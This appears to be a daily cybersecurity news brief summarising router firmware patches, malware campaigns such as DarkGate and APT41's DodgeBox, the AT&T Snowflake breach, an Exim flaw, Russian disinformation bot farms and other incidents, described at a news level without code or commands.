Daily Brief

Netgear has issued a firmware update for multiple WiFi 6 routers to rectify critical vulnerabilities including a stored XSS and an authentication bypass. The XSS flaw, identified in the XR1000 Nighthawk model, could potentially allow attackers to hijack user sessions or direct users to malicious sites by exploiting the router’s interface. The authentication bypass issue in the CAX30 Nighthawk AX6 model poses severe threats, enabling unauthorized administrative access and possibly full device control. Firmware updates correcting these issues are now available and strongly recommended by Netgear for immediate installation. The advisory highlights serious potential compromises, including session hijacking, privileged actions without consent, and full system takeover. Users are urged to promptly download the updated firmware versions—1.0.0.72 for XSS vulnerability and 2.2.2.2 for the authentication bypass—to mitigate risks. Netgear has been in news recently, with another set of vulnerabilities disclosed in the now unsupportable WNR614 N300 model, emphasizing ongoing security challenges. The company's statement emphasized their non-liability for consequences of not adhering to recommended security measures.

Netgear advises users to update their routers' firmware to patch critical vulnerabilities affecting multiple WiFi 6 router models. The stored XSS flaw (PSV-2023-0122), fixed in firmware version 1.0.0.72, affects the XR1000 Nighthawk gaming router and could allow attackers to hijack user sessions and steal data. An authentication bypass issue (PSV-2023-0138), resolved in firmware version 2.2.2.2, impacts the CAX30 Nighthawk AX6 6-Stream cable modem routers, potentially permitting unauthorized administrative access. Both vulnerabilities pose significant security risks, especially the authentication bypass which could lead to a complete takeover of the device. A spokesperson from Netgear was unavailable for comment when additional details of the flaws were sought by the press. Users affected by the flaws are strongly urged by Netgear to download and install the latest firmware updates as a preventive measure against potential attacks. Netgear also cautioned users of the WNR614 N300 router about multiple vulnerabilities, recommending replacement due to the lack of support for this end-of-life model.

Palo Alto Networks' Unit 42 identified a malware campaign utilizing DarkGate to exploit Samba file shares across North America, Europe, and Asia during March and April 2025. The malware infiltrates systems through malicious Microsoft Excel (.xlsx) files prompting users to execute embedded scripts from Samba servers. DarkGate, emerging as a MaaS since 2018, enables remote control, code execution, cryptocurrency mining, and the deployment of further payloads. The campaign reemerged strongly following the takedown of the QakBot infrastructure by law enforcement in August 2023. Attack sequences also involve JavaScript, using similarly deceptive methods to download and initiate malware via PowerShell scripts. DarkGate evades detection by scanning for anti-malware software and assessing the CPU to determine if it operates on a physical or virtual machine. Communication with its command and control (C2) servers is obfuscated within unencrypted HTTP requests to avoid easy tracing. Researchers underscore the enduring threat of DarkGate due to its evolving tactics and highlight the imperative for robust cybersecurity measures.

Living Off The Land (LOTL) attacks exploit existing system tools to remain undetected, presenting a challenge due to their fileless nature and lack of unique signatures. LOTL attackers utilize built-in binaries, scripts, and system utilities, camouflaging malicious activities within normal operations. Wazuh, a security platform, offers capabilities such as Extended Detection and Response (XDR) and Security Information and Event Management (SIEM) to monitor and counter such threats. Effective detection strategies include continuous monitoring for unusual system tool usage, real-time analysis of log data, and anomaly detection in system configurations and resource consumption. Wazuh's features include log data analysis, file integrity monitoring, threat detection, real-time alerting, and automated incident response to enhance protections against LOTL tactics. Regular vulnerability scans are critical, allowing organizations to patch detected weaknesses and reduce the attack surface for potential exploitation by LOTL methods. The platform's customizable nature allows for the integration of third-party solutions to adapt to specific organizational needs and enhance overall cyber resilience.

Threat actors increasingly exploit weak points in identity security, targeting user identities and multi-factor authentication (MFA) systems. New security solutions, such as Shared Signals and Identity Threat Detection and Response (ITDR) systems enhanced with machine learning, are being developed to counter these vulnerabilities. Upcoming frameworks and technologies, including digital, verifiable credentials, are poised to innovate the landscape of identity security. Cisco's upcoming webinar, featuring security strategists Sami Laine and Josh Green, will discuss the evolution of identity security and the integral components of Cisco Duo's solution, including Identity Intelligence and Risk-Based Access Policies. The webinar aims to educate on making MFA unobtrusive, thus improving the user experience without compromising security effectiveness. Attendees of the webinar, scheduled for 17 July 2024, can expect to gain insights into enhancing their organization’s security posture against identity threats.

AT&T disclosed a significant data breach resulting from a cyberattack on a third-party cloud platform, impacting approximately 110 million customers. The breach affected almost all AT&T wireless customers, including those on mobile virtual network operators using AT&T’s network, exposing call and text metadata. Personal information of customers was not compromised; however, geolocation data could potentially be accessed due to exposed cell tower identification numbers in the stolen records. The Federal Bureau of Investigation (FBI) has made at least one arrest in connection with the data theft and has been involved with the case since its discovery in mid-April. AT&T believes that stolen customer data has not been published online yet but remains cautious about the potential risks and exposure. The incident followed another major data leak disclosed in March, where data from 73 million customers was published online, signaling an alarming trend of data security challenges for the company. This breach is part of a broader incident affecting Snowflake's cloud storage instances, where attackers used credential-stuffing techniques to access data from approximately 165 companies. Snowflake has since mandated multifactor authentication for all customers, aiming to improve security measures post-breach.

AT&T confirmed a significant data breach from their Snowflake account affecting nearly all mobile customers, involving the theft of call and text records. Approximately 109 million customers' call logs from specified dates in 2022 and 2023 were exposed; however, personal identifiers like names or Social Security numbers were not included. The breach occurred between April 14 and April 25, 2024, with stolen data containing metadata that could potentially be used to identify individuals when correlated with other public data. The Department of Justice permitted AT&T to delay public notification twice to facilitate a law enforcement investigation into the sensitive nature of stolen records. AT&T has increased cybersecurity safeguards, collaborated with law enforcement, and apprehended at least one suspect in connection with the breach. Current and former customers will be notified by AT&T and can check if their information was compromised via an AT&T-provided FAQ page. There is no current evidence that the breached data has been publicly disclosed, and this breach is said to be unrelated to a previous incident in 2021. The breach is part of a broader trend of cyberattacks targeting Snowflake customers, leading the company to enforce stronger security measures such as mandatory multi-factor authentication.

A married couple, Australian Defence Force (ADF) Private Kira Korolev and her husband Igor, were arrested in Brisbane on charges of espionage for Russia. The operation, codenamed BURGAZADA, was triggered after Kira traveled to Russia and instructed Igor to access her ADF work account to send sensitive information to her private email. The couple face charges of preparing for an espionage offense, with penalties up to 15 years in prison. This marks the first use of Australia’s espionage laws updated in 2018. The Australian Federal Police (AFP) state that the accessed documents pertained to national security, though specifics on the documents remain undisclosed. Investigations continue into whether the information was actually conveyed to Russian authorities. Australian officials highlight the intensifying global espionage threats, emphasizing the ongoing risks to national security and sovereignty. This case is one of several recent charges in Australia related to espionage or foreign interference, illustrating a broader pattern of rising international espionage activities.

A significant vulnerability identified in Exim mail servers potentially exposes millions to malicious email attachments. Designated as CVE-2024-39929, this flaw has a critical severity rating of 9.1 and affects versions up to 4.97.1. The susceptibility stems from improper parsing of RFC 2231 multiline headers, allowing attackers to circumvent MIME filename extension filters. Over 4.83 million of approximately 6.54 million internet-accessible SMTP servers operate using the vulnerable Exim versions. The most impacted regions include the U.S., Russia, and Canada, with many servers still unpatched as of the latest reports. Successful exploitation requires a user to download and execute the malicious attachment, posing significant risks of system compromise. No active exploits have been reported yet; however, immediate update to version 4.98 is advised to mitigate this risk. The discovery follows a previous set of vulnerabilities found nearly a year ago, emphasizing continual security challenges for Exim.

Recent data shows compromised credentials as the leading attack vector in 2024. Stolen passwords pose more of a threat than zero-day exploits or advanced malware. Many are unaware their credentials are stolen until significant damage occurs. Consequences include drained bank accounts, stolen identity, and damaged corporate reputations. The upcoming webinar hosted by Tim Chase focuses on prevention and awareness regarding password theft. Participants will gain insights into protecting sensitive information from credential compromise.

The U.S. Department of Justice seized internet domains and scrutinized numerous social media accounts used by Russian entities to disseminate disinformation. AI technology was employed by a bot farm to construct fake profiles purporting to be Americans to push narratives favorable to the Kremlin. An employee from Russian state media RT and an FSB officer orchestrated the bot network to influence public opinion in multiple countries including the U.S. and several European nations. The operation utilized an AI software named Meliorator for mass creation and management of these profiles on social media platform X, which has now suspended these accounts. Investigations remain active, with no criminal charges disclosed yet, highlighting the ongoing concerns over foreign influence in domestic affairs. Google, Meta, and OpenAI have flagged continuous misuse of their platforms by similar Russian operations, notably a disinformation network named Doppelganger. International collaborations, including agencies from the U.S., Canada, and the Netherlands, have been pivotal in addressing this cybersecurity threat.

The Monetary Authority of Singapore and the Association of Banks Singapore announced the phasing out of SMS-based OTPs for bank logins within three months, aiming to bolster security against phishing. This decision reflects growing concerns about scammers exploiting the vulnerabilities of SMS OTPs, driving a shift towards more secure digital tokens for authentication. Digital tokens, which generate OTPs on smartphones, are recommended as a safer alternative for securing bank account access. Legal expert Bryan Tan views the move as a logical step given the increasing frequency of OTP-related scams. Concerns have been raised about the inclusivity of this change, particularly affecting the elderly and those without smartphones, with no clear measures announced yet to address these issues. Despite potential inconvenience, this strategic shift is part of broader efforts to enhance digital security and minimize scam risks in Singapore's banking sector. Smartphone penetration in Singapore is high at 97% in 2023, yet challenges remain in ensuring all demographics maintain secure and up-to-date technology usage.

Chinese cyber espionage group APT41, linked to the Chinese Ministry of State Security, reportedly adds new tools, DodgeBox and MoonWalk, to its malicious software arsenal. Zscaler’s ThreatLabz identifies and analyzes the new malware, noting notable similarities and enhancements compared to APT41's previous tool, StealthVector. DodgeBox, characterized as a sophisticated shellcode loader, introduces advanced features for evading detection and maximizing system privileges, including environment checks and AES encryption. The malware uses novel hashing techniques and system checks to bypass static detection and security measures such as Windows Control Flow Guard. MoonWalk backdoor, deployed via DodgeBox, features evasion methods similar to the loader and uses Google Drive for command-and-control operations. Incidents of DodgeBox have been identified primarily in Southeast Asia, aligning with APT41's geographical focus in previous campaigns. The U.S. government has previously charged members of APT41 with global cyber attacks, suggesting both espionage and financially motivated activities.

Hacktivist group SiegedSec, identifying as "gay furry hackers," has disbanded after hacking The Heritage Foundation and leaking 2GB of its files. The group claims the disbandment was planned prior to the raid for reasons including stress and desire to avoid FBI attention. The leaked files were in retaliation against The Heritage Foundation's involvement with Project 2025, a blueprint for conservative presidential policies. Project 2025, linked to Donald Trump and the Republican National Committee, aims to reshape US government policies including significant cuts to healthcare and environmental regulations. The Heritage Foundation did not officially respond to inquiries about the security breach or leaked communications with SiegedSec. SiegedSec has a history of targeting organizations it perceives as threatening LGBTQ+ and abortion rights, including America's largest nuclear power lab and NATO. In a leaked conversation, Heritage Foundation's Mike Howell threatened the hacktivists with exposure and legal consequences, which clashed with the organization's Christian values.

The American Radio Relay League (ARRL) confirmed a data breach by a ransomware attack on May 14, affecting employee personal information. The breach was initially described as a "serious incident" and later identified as a "sophisticated ransomware incident." External forensic experts were hired to analyze the breach, and systems were taken offline to contain the spread. ARRL identified the attackers as a "malicious international cyber group" and has engaged federal law enforcement for further investigation. Personal data stolen includes names, addresses, and social security numbers of 150 employees. ARRL has provided 24 months of free identity monitoring to impacted individuals out of caution, even though there is no evidence of misuse of the stolen data. It is speculated that the Embargo ransomware group, newly active since May, is responsible for the attack; however, ARRL has not confirmed this link. ARRL hinted that reasonable steps were taken to prevent further distribution of the data, implying a possible ransom payment to avoid data leakage.